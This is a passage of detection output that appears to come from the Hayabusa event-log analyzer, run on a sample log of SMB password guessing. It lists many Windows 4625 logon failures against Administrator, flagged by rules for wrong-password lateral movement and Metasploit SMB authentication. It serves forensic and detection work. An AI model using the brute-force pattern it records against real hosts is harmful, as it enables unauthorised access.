Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nDBqxF9bmNNjNdsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QJNBRV3BRVEN8hmG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OGl1Tbdw7PDvVsRR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uspHTc4JwnjjZQti : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Exq3nfy1LeFOPcA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vdFC4g7vsLO0zOzL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HpdCohLheoqQ6DXw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xHS3sclMwgHuH8rE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sNSheImuQwgOEH5g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GX5y374mlYYXbAB2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eaFRL6q9KQY5bFHZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MrkEyJmfLiSrvQGs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fd1vJiJa3pdjqdQV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RVrZl3LOIa7VLhT7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TKR8KbyQkwRX1qTE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GY22XuDxbE5lvEra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4AntiX3j9HLHcOOq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XIvMbod41WeNADy5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0UL4lb3CCrv7YfGQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OyRktDjPqFyrdSTQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HKEGmAH8Wbc7f3jC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 06Dfi4lO2Vdw3gCr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 29eXmenUTACkAHKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Zq7Gl6hnKDJJqFc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jKENlWYt6m78taZR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 822SUU2Hg6w6AqQh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bROU0Mk9Z4yEq323 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EKfVPleDpLLqkuKq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NGWVqbchMitnLVYT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y7K9vifU9lWwpP9J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oIgKYj210JfICJXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jisuKilPQivTV8yE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hckyoom0XnqpRzK8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: De0l6qgcuhMERjMY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SSa7pylPWn8jl2Ox : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ol9OntO4hqidlNUi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kXOBF0ZWLxMauHuT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WVBFJltkR5vnmpYD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kHVXEHq9zNYdfTpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OIw3BxmLsfwDXXFg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hhgRhjnhkRJus4fw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xz78guWXrekEvuFT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 04wNT26RJmriQrfH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XmbuuymdSpfNldt2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yqJarBVOImq5Tn2p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BZYExQroYH65tPuG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: llU5DQBrIrV3VtG5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 